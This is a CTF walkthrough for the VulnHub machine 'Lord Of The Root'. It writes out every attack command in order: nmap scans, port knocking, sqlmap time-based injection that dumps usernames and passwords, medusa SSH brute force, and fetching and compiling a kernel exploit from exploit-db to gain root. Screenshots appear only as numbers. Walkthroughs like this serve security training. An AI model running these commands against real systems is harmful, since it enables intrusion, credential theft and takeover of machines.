Skip to content

Latest commit

 

History

History
173 lines (85 loc) · 7.81 KB

Lord Of The Root.md

File metadata and controls

173 lines (85 loc) · 7.81 KB

İndirme Linki; https://www.vulnhub.com/entry/lord-of-the-root-101%2C129/

To find the ip address of the virtual machine after the lab setup

netdiscover -i eth1 -r 192.168.56/24
we run the above command

1

2

When we look at the output above, we have found the ip address of the virtual machine. Now we will do an nmap scan in the next step.

nmap -T5 -A -n 192.168.56.104

we run the above command 3

As can be seen from the output, we see that the ssh service is open and we are trying to establish an ssh connection. ssh root@192.168.56.104 we run the above command

4

When we look at the output, a message is given that we need to perform port knocking.

Download the python tool here; https://github.com/grongor/knock

./knock.py 192.168.56.104 1 2 3

we run the above command.

5

And again we scan with nmap.

nmap -T5 -sS -A -n 192.168.56.104 --top-ports 1000

we run the above command.

6

As can be seen in the printout, it has been seen that port 1337 is open and the website has been visited.

7

When we visit the website, there is a photo and an inscription on it that I will take the ring to mordor. Looking at the source code of the site, only a single line img src of the photo was seen, it was understood that we could not get anything from this page, and directory discovery was started.

dirb http://192.168.56.104/1337

we run the above command.

8

and as we can see from the output, the images folder was found, the files in the images folder were checked with exiftool and binwalk, the contrast settings of the downloaded photos were changed. No results were obtained from these searches. Robots.txt, which is one of the pages to be checked in every CTF, was checked.

9

As we can see in the output above, a photo again welcomes us and we look at the source code of the page.

10

and we found something as we will see in the output. We see it in 2 times encoded base64 format, we decode them.

11

we go to the directory we found in the output.

12

and the gates of mordor welcome us :) . It is thought that there is a sql injection vulnerability on this login page and the necessary tests have been continued. We run Burp, activate the intercept, send a post request and save the request here.

14

After saving the request here, we open it with the text editor.

15

As you can see, the * character has been added to the end of the usertest text. For this burp, it is specified where the post request and payloads are sent.

sqlmap -r burpresult.txt(dosya adımız) --technique T --dbms mysql --dbs

We run the command and see that the vulnerability exists and start pulling database names.

16

Looking at the database names, it is obvious that the information of the database named Webapp will be retrieved.

sqlmap -r burpresult.txt --dbms mysql --technique T --tables -D Webapp

17 18

Let's start pulling the columns in the Users table, which is the only table, but first, let's learn the column names to pull the data in the column.

sqlmap -r burpresult.txt --dbms mysql --technique T -D Webapp -T Users --columns 19

Since there are username and password columns we need here, we start pulling the data there.

sqlmap -r burpresult.txt --dbms mysql --technique T -D Webapp -T Users -C username --dump

20

We pulled the username information, now let's pull the password information.

sqlmap -r burpresult.txt --dbms mysql --technique T -D Webapp -T Users -C password --dump

21

We write these user names and passwords to a text file. 22 23

Since we do not know which user is authorized to connect via ssh, we will brute force the ssh service with medusa. medusa -h 192.168.56.104 -U users -P passwords -M ssh

24

Our brute force attack yielded results and we found the username and password, now we make an ssh connection with this information.

ssh smeagol@192.168.56.104

After that, we are asked for the password and we enter the password MyPreciousR00t here and we fall into the shell. After the shell is dropped, we type whoami and see who we are.

25

We see that we are not root and we need to investigate whether there are exploits to raise rights on this system. First, we run the following command and see the system information and version.

uname -a

26

We type the system information into the google search engine and search for exploits.

27

Here we come across 2 exploits, we try the first of them.

wget https://www.exploit-db.com/download/39166

28

Then, as shown in the screen shoot below, we enter the commands in order and compile and run our C code.

29

When we type whoami, we see that we are root.

30

and we go to the root directory and read the Flag.txt in it and end the CTF here.

Thank you for reading.